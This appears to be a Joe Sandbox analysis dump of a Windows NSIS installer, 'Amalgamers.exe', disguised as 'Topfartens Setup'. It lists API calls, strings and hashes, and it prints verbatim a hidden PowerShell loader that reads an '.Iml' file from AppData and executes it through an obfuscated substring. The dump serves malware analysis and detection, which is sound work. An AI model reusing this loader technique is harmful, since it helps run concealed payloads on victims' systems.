GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020,?,00000006,00000008,0000000A), ref: 00403417
GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 00403428
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 00403434
GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 00403448
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403450
SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403461
SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403469
DeleteFileA.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 0040347D

Part of subcall function 00406338: GetModuleHandleA.KERNEL32(?,?,?,0040327F,0000000A), ref: 0040634A
Part of subcall function 00406338: GetProcAddress.KERNEL32(00000000,?), ref: 00406365

Part of subcall function 004037CE: lstrlenA.KERNEL32(Execute: ,?,?,?,Execute: ,00000000,C:\Users\user\AppData\Local\Reglements216,1033,Topfartens Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Topfartens Setup: Installing,00000000,00000002,74DF3410), ref: 004038BE
Part of subcall function 004037CE: lstrcmpiA.KERNEL32(?,.exe), ref: 004038D1
Part of subcall function 004037CE: GetFileAttributesA.KERNEL32(Execute: ), ref: 004038DC
Part of subcall function 004037CE: LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Reglements216), ref: 00403925
Part of subcall function 004037CE: RegisterClassA.USER32(0042EBA0), ref: 00403962

Part of subcall function 004036F4: CloseHandle.KERNEL32(000002C8,0040352B,?,?,00000006,00000008,0000000A), ref: 004036FF

OleUninitialize.OLE32(?,?,00000006,00000008,0000000A), ref: 0040352B
ExitProcess.KERNEL32 ref: 0040354C
GetCurrentProcess.KERNEL32(00000028,?,00000006,00000008,0000000A), ref: 00403669
OpenProcessToken.ADVAPI32(00000000), ref: 00403670
LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403688
AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 004036A7
ExitWindowsEx.USER32(00000002,80040002), ref: 004036CB
ExitProcess.KERNEL32 ref: 004036EE

Part of subcall function 004056BC: MessageBoxIndirectA.USER32(0040A218), ref: 00405717

Strings

C:\Users\user\Desktop\Amalgamers.exe, xrefs: 00403609
UXTHEME, xrefs: 0040325E, 00403263, 00403269
", xrefs: 0040333F
SeShutdownPrivilege, xrefs: 00403682
C:\Users\user\AppData\Local\Reglements216, xrefs: 004033FC, 004034FD, 004035A7, 004035B0
"C:\Users\user\Desktop\Amalgamers.exe", xrefs: 004032E4, 004032EA, 004034A1
TEMP, xrefs: 0040345C
1033, xrefs: 00403478
TMP, xrefs: 00403464
`Kt, xrefs: 00403455
NSIS Error, xrefs: 004032CF
Low, xrefs: 0040344A
C:\Users\user\AppData\Local\Temp\, xrefs: 0040340C, 00403411, 00403427, 00403433, 00403442, 0040344F, 0040345B, 00403463, 0040355C, 0040356D, 00403578, 00403584, 00403591, 004035A0, 0040364F
.tmp, xrefs: 00403573
C:\Users\user\AppData\Local\Reglements216\Fessewise, xrefs: 00403508
C:\Users\user\Desktop, xrefs: 0040357E, 00403583, 004035AF
Topfartens Setup, xrefs: 004032D4
~nsu, xrefs: 00403557
Error launching installer, xrefs: 004034E3
\Temp, xrefs: 0040342E
powershell.exe -windowstyle hidden, xrefs: 004035BE

Memory Dump Source

Source File: 00000000.00000002.1669510459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1669498435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669527340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669643783.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669643783.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Amalgamers.jbxd

Similarity

API ID: Process$ExitFile$EnvironmentHandlePathTempTokenVariableWindowslstrcatlstrlen$AddressAdjustAttributesCharClassCloseCommandCurrentDeleteDirectoryErrorImageIndirectInfoInitializeLineLoadLookupMessageModeModuleNextOpenPrivilegePrivilegesProcRegisterUninitializeValueVersionlstrcmpi
String ID: "$"C:\Users\user\Desktop\Amalgamers.exe"$.tmp$1033$C:\Users\user\AppData\Local\Reglements216$C:\Users\user\AppData\Local\Reglements216\Fessewise$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Amalgamers.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$Topfartens Setup$UXTHEME$\Temp$`Kt$powershell.exe -windowstyle hidden$~nsu
API String ID: 3776617018-4064138589
Opcode ID: aa8e0ef1eb72b8bc744683be083ef578b0b61129bd2ec06390cc6719ef15a54d
Instruction ID: 947ab88924f8c3b38e2aea5cfaab7316d1dfac26a51a196f62222c0ed64aafcd
Opcode Fuzzy Hash: aa8e0ef1eb72b8bc744683be083ef578b0b61129bd2ec06390cc6719ef15a54d
Instruction Fuzzy Hash: EEC1D470604741AAD7216F759E89B2F3EACAF45706F44053FF581B61E2CB7C8A058B2E

Function 00405205 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 282
windowclipboardmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDlgItem.USER32(?,00000403), ref: 00405264
GetDlgItem.USER32(?,000003EE), ref: 00405273
GetClientRect.USER32(?,?), ref: 004052B0
GetSystemMetrics.USER32(00000002), ref: 004052B7
SendMessageA.USER32(?,0000101B,00000000,?), ref: 004052D8
SendMessageA.USER32(?,00001036,00004000,00004000), ref: 004052E9
SendMessageA.USER32(?,00001001,00000000,?), ref: 004052FC
SendMessageA.USER32(?,00001026,00000000,?), ref: 0040530A
SendMessageA.USER32(?,00001024,00000000,?), ref: 0040531D
ShowWindow.USER32(00000000,?,0000001B,?), ref: 0040533F
ShowWindow.USER32(?,00000008), ref: 00405353
GetDlgItem.USER32(?,000003EC), ref: 00405374
SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405384
SendMessageA.USER32(00000000,00000409,00000000,?), ref: 0040539D
SendMessageA.USER32(00000000,00002001,00000000,?), ref: 004053A9
GetDlgItem.USER32(?,000003F8), ref: 00405282

Part of subcall function 00404074: SendMessageA.USER32(00000028,?,00000001,00403EA4), ref: 00404082

GetDlgItem.USER32(?,000003EC), ref: 004053C5
CreateThread.KERNELBASE(00000000,00000000,Function_00005199,00000000), ref: 004053D3
CloseHandle.KERNELBASE(00000000), ref: 004053DA
ShowWindow.USER32(00000000), ref: 004053FD
ShowWindow.USER32(?,00000008), ref: 00405404
ShowWindow.USER32(00000008), ref: 0040544A
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040547E
CreatePopupMenu.USER32 ref: 0040548F
AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 004054A4
GetWindowRect.USER32(?,000000FF), ref: 004054C4
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004054DD
SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405519
OpenClipboard.USER32(00000000), ref: 00405529
EmptyClipboard.USER32 ref: 0040552F
GlobalAlloc.KERNEL32(00000042,?), ref: 00405538
GlobalLock.KERNEL32(00000000), ref: 00405542
SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405556
GlobalUnlock.KERNEL32(00000000), ref: 0040556F
SetClipboardData.USER32(00000001,00000000), ref: 0040557A
CloseClipboard.USER32 ref: 00405580

Strings

Topfartens Setup: Installing, xrefs: 004054F5

Memory Dump Source

Source File: 00000000.00000002.1669510459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1669498435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669527340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669643783.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669643783.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Amalgamers.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: Topfartens Setup: Installing
API String ID: 590372296-328806273
Opcode ID: 8d4fafd702a39b7bb38b3c828f48a19304575bcb563af6747f1ba819efe14e22
Instruction ID: f54484deaadc53d59d965fa3ad24bc50442bab3dbb2bc57f5e3c058b1bd1a4dd
Opcode Fuzzy Hash: 8d4fafd702a39b7bb38b3c828f48a19304575bcb563af6747f1ba819efe14e22
Instruction Fuzzy Hash: 10A14871900608BFDB11AF61DE89AAF7F79FB08354F40403AFA41B61A0C7754E519F68

Function 004062A3 Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNELBASE(74DF3410,0042C0C0,0042BC78,00405A69,0042BC78,0042BC78,00000000,0042BC78,0042BC78,74DF3410,?,C:\Users\user\AppData\Local\Temp\,00405788,?,74DF3410,C:\Users\user\AppData\Local\Temp\), ref: 004062AE
FindClose.KERNEL32(00000000), ref: 004062BA

Memory Dump Source

Source File: 00000000.00000002.1669510459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1669498435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669527340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669643783.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669643783.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Amalgamers.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: f33084ac43254253387421f94672507a8f359bb84d60abe7f61aad8f4daa312f
Instruction ID: 1e2c953ed1559e2f686ededff4fae2b078191910b4ed7f61f032671a7c701700
Opcode Fuzzy Hash: f33084ac43254253387421f94672507a8f359bb84d60abe7f61aad8f4daa312f
Instruction Fuzzy Hash: ACD01236519020ABC21027787E0C84B7A589F053347118A7BF4A6F21E0C7348C6686DC

Function 00403B6B Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 346
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403BA7
ShowWindow.USER32(?), ref: 00403BC4
DestroyWindow.USER32 ref: 00403BD8
SetWindowLongA.USER32(?,00000000,00000000), ref: 00403BF4
GetDlgItem.USER32(?,?), ref: 00403C15
SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403C29
IsWindowEnabled.USER32(00000000), ref: 00403C30
GetDlgItem.USER32(?,00000001), ref: 00403CDE
GetDlgItem.USER32(?,00000002), ref: 00403CE8
SetClassLongA.USER32(?,000000F2,?), ref: 00403D02
SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403D53
GetDlgItem.USER32(?,00000003), ref: 00403DF9
ShowWindow.USER32(00000000,?), ref: 00403E1A
KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403E2C
EnableWindow.USER32(?,?), ref: 00403E47
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403E5D
EnableMenuItem.USER32(00000000), ref: 00403E64
SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403E7C
SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403E8F
lstrlenA.KERNEL32(Topfartens Setup: Installing,?,Topfartens Setup: Installing,00000000), ref: 00403EB9
SetWindowTextA.USER32(?,Topfartens Setup: Installing), ref: 00403EC8
ShowWindow.USER32(?,0000000A), ref: 00403FFC

Strings

Topfartens Setup: Installing, xrefs: 00403EA9, 00403EAF, 00403EB8, 00403EC6

Memory Dump Source

Source File: 00000000.00000002.1669510459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1669498435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669527340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669643783.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669643783.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Amalgamers.jbxd

Similarity

API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID: Topfartens Setup: Installing
API String ID: 3282139019-328806273
Opcode ID: d4f5cfe3c3c51a6681682eed2f77fa7a99c8bad0dac829668d753dca6044b2b8
Instruction ID: 5f88be39a50f3dd075596c1c1d09af532afca629c850b085fe9e60943a8810da
Opcode Fuzzy Hash: d4f5cfe3c3c51a6681682eed2f77fa7a99c8bad0dac829668d753dca6044b2b8
Instruction Fuzzy Hash: B7C19171604605ABEB206F62DE45E2B3FBCEB4570AF40053EF642B11E1CB799942DB1D

Function 004037CE Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406338: GetModuleHandleA.KERNEL32(?,?,?,0040327F,0000000A), ref: 0040634A
Part of subcall function 00406338: GetProcAddress.KERNEL32(00000000,?), ref: 00406365

lstrcatA.KERNEL32(1033,Topfartens Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Topfartens Setup: Installing,00000000,00000002,74DF3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Amalgamers.exe",00000000), ref: 00403849
lstrlenA.KERNEL32(Execute: ,?,?,?,Execute: ,00000000,C:\Users\user\AppData\Local\Reglements216,1033,Topfartens Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Topfartens Setup: Installing,00000000,00000002,74DF3410), ref: 004038BE
lstrcmpiA.KERNEL32(?,.exe), ref: 004038D1
GetFileAttributesA.KERNEL32(Execute: ), ref: 004038DC
LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Reglements216), ref: 00403925

Part of subcall function 00405EFE: wsprintfA.USER32 ref: 00405F0B

RegisterClassA.USER32(0042EBA0), ref: 00403962
SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 0040397A
CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 004039AF
ShowWindow.USER32(00000005,00000000), ref: 004039E5
GetClassInfoA.USER32(00000000,RichEdit20A,0042EBA0), ref: 00403A11
GetClassInfoA.USER32(00000000,RichEdit,0042EBA0), ref: 00403A1E
RegisterClassA.USER32(0042EBA0), ref: 00403A27
DialogBoxParamA.USER32(?,00000000,00403B6B,00000000), ref: 00403A46

Strings

RichEdit20A, xrefs: 00403A09, 00403A0F
C:\Users\user\AppData\Local\Reglements216, xrefs: 00403858, 00403860, 004038F8, 004038FE, 0040390E
"C:\Users\user\Desktop\Amalgamers.exe", xrefs: 004037D2
RichEd32, xrefs: 004039F9
1033, xrefs: 004037EE, 00403844
.exe, xrefs: 004038CB
_Nb, xrefs: 00403941, 004039A9
C:\Users\user\AppData\Local\Temp\, xrefs: 004037D3
RichEdit, xrefs: 00403A18
Control Panel\Desktop\ResourceLocale, xrefs: 00403802
Execute: , xrefs: 0040388C, 00403894, 004038A1, 004038EB, 004038F1
.DEFAULT\Control Panel\International, xrefs: 00403834
Topfartens Setup: Installing, xrefs: 004037FA, 00403800, 00403825, 0040382E, 00403843
RichEd20, xrefs: 004039EB

Memory Dump Source

Source File: 00000000.00000002.1669510459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1669498435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669527340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669643783.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669643783.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Amalgamers.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Users\user\Desktop\Amalgamers.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Reglements216$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$Execute: $RichEd20$RichEd32$RichEdit$RichEdit20A$Topfartens Setup: Installing$_Nb
API String ID: 1975747703-1190116024
Opcode ID: b2ce040b6a925dc6c5459230d15a4a62e33f579bfde2c301426bad79e665be96
Instruction ID: 26e7699ed4e6b10e00d4509f8022fed07cb2a9a1b54ab9853cf40adcb97aba69
Opcode Fuzzy Hash: b2ce040b6a925dc6c5459230d15a4a62e33f579bfde2c301426bad79e665be96
Instruction Fuzzy Hash: 2B61C970340601BED620BB669D46F373EACEB54749F80447FF985B22E2CB7C59069A2D

Function 00402D63 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 182
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00402D74
GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\Amalgamers.exe,00000400), ref: 00402D90

Part of subcall function 00405B39: GetFileAttributesA.KERNELBASE(00000003,00402DA3,C:\Users\user\Desktop\Amalgamers.exe,80000000,00000003), ref: 00405B3D
Part of subcall function 00405B39: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B5F

GetFileSize.KERNEL32(00000000,00000000,00437000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Amalgamers.exe,C:\Users\user\Desktop\Amalgamers.exe,80000000,00000003), ref: 00402DDC

Strings

C:\Users\user\Desktop\Amalgamers.exe, xrefs: 00402D7A, 00402D89, 00402D9D, 00402DBD
C:\Users\user\AppData\Local\Temp\, xrefs: 00402D6A
Null, xrefs: 00402E5A
soft, xrefs: 00402E51
"C:\Users\user\Desktop\Amalgamers.exe", xrefs: 00402D63
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402F3B
C:\Users\user\Desktop, xrefs: 00402DBE, 00402DC3, 00402DC9
Error launching installer, xrefs: 00402DB3
Inst, xrefs: 00402E48

Memory Dump Source

Source File: 00000000.00000002.1669510459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1669498435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669527340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669643783.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669643783.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Amalgamers.jbxd

Similarity

API ID: File$AttributesCountCreateModuleNameSizeTick
String ID: "C:\Users\user\Desktop\Amalgamers.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Amalgamers.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
API String ID: 4283519449-4234843517
Opcode ID: 00a06a9a68cc67566cb868d600969febe4cd82948185b04c924e3ebd15472d20
Instruction ID: 2bf3385630e85dd4df9d7bf2b803376e12afffe2b97a8d7f9aa5fd2bd7c684e6
Opcode Fuzzy Hash: 00a06a9a68cc67566cb868d600969febe4cd82948185b04c924e3ebd15472d20
Instruction Fuzzy Hash: BD51F571900214ABDB219F65DE89B9F7AB8EB14368F50403BF904B72D0C7BC9D458BAD

Function 00405FC2 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 199
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryA.KERNEL32(Execute: ,00000400), ref: 004060ED
GetWindowsDirectoryA.KERNEL32(Execute: ,00000400,?,Execute: powershell.exe -windowstyle hidden "$Defektes=Get-Content -Raw 'C:\Users\user\AppData\Local\Reglements216\Akhoond106.Iml';$Dermoosseous=$Defektes.SubString(55328,3);.$Dermoosseous($Defektes) ",00000000,004050FF,Execute: powershell.exe -windowstyle hidden "$Defektes=Get-Content -Raw 'C:\Users\user\AppData\Local\Reglements216\Akhoond106.Iml';$Dermoosseous=$Defektes.SubString(55328,3);.$Dermoosseous($Defektes) ",00000000), ref: 00406100
SHGetSpecialFolderLocation.SHELL32(004050FF,74DF23A0,?,Execute: powershell.exe -windowstyle hidden "$Defektes=Get-Content -Raw 'C:\Users\user\AppData\Local\Reglements216\Akhoond106.Iml';$Dermoosseous=$Defektes.SubString(55328,3);.$Dermoosseous($Defektes) ",00000000,004050FF,Execute: powershell.exe -windowstyle hidden "$Defektes=Get-Content -Raw 'C:\Users\user\AppData\Local\Reglements216\Akhoond106.Iml';$Dermoosseous=$Defektes.SubString(55328,3);.$Dermoosseous($Defektes) ",00000000), ref: 0040613C
SHGetPathFromIDListA.SHELL32(74DF23A0,Execute: ), ref: 0040614A
CoTaskMemFree.OLE32(74DF23A0), ref: 00406156
lstrcatA.KERNEL32(Execute: ,\Microsoft\Internet Explorer\Quick Launch), ref: 0040617A
lstrlenA.KERNEL32(Execute: ,?,Execute: powershell.exe -windowstyle hidden "$Defektes=Get-Content -Raw 'C:\Users\user\AppData\Local\Reglements216\Akhoond106.Iml';$Dermoosseous=$Defektes.SubString(55328,3);.$Dermoosseous($Defektes) ",00000000,004050FF,Execute: powershell.exe -windowstyle hidden "$Defektes=Get-Content -Raw 'C:\Users\user\AppData\Local\Reglements216\Akhoond106.Iml';$Dermoosseous=$Defektes.SubString(55328,3);.$Dermoosseous($Defektes) ",00000000,00000000,004195D8,74DF23A0), ref: 004061CC

Strings

Execute: powershell.exe -windowstyle hidden "$Defektes=Get-Content -Raw 'C:\Users\user\AppData\Local\Reglements216\Akhoond106.Iml';$Dermoosseous=$Defektes.SubString(55328,3);.$Dermoosseous($Defektes) ", xrefs: 00405FE7
Execute: , xrefs: 00405FEC, 004060B9, 004060BA, 004060BB, 004060D7, 004060EC, 004060FF, 0040611B, 00406146, 00406179, 0040617F, 00406197, 004061AA, 004061C5, 004061CB, 004061D3, 004061FD
\Microsoft\Internet Explorer\Quick Launch, xrefs: 00406174
Software\Microsoft\Windows\CurrentVersion, xrefs: 004060BC
powershell.exe -windowstyle hidden, xrefs: 004061A4

Memory Dump Source

Source File: 00000000.00000002.1669510459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1669498435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669527340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669643783.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669643783.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Amalgamers.jbxd

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
String ID: Execute: $Execute: powershell.exe -windowstyle hidden "$Defektes=Get-Content -Raw 'C:\Users\user\AppData\Local\Reglements216\Akhoond106.Iml';$Dermoosseous=$Defektes.SubString(55328,3);.$Dermoosseous($Defektes) "$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$powershell.exe -windowstyle hidden
API String ID: 717251189-2403248708
Opcode ID: 6fb7d4b9e0176c72f21e117460eb3ab44bee62ba2a965ffc372a20c4b8672acd
Instruction ID: 67ab450255a0c50706d08a2588864b7c9a920b8361f3652e316ab2a1c483ee89
Opcode Fuzzy Hash: 6fb7d4b9e0176c72f21e117460eb3ab44bee62ba2a965ffc372a20c4b8672acd
Instruction Fuzzy Hash: C661E375900105AEDB209F24CD84BBF7BA4AB15314F52413FEA03BA2D2C67C8962CB5D

Function 00402F9C Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 166
COMMON

Download Yara Rule

Control-flow Graph

Executed
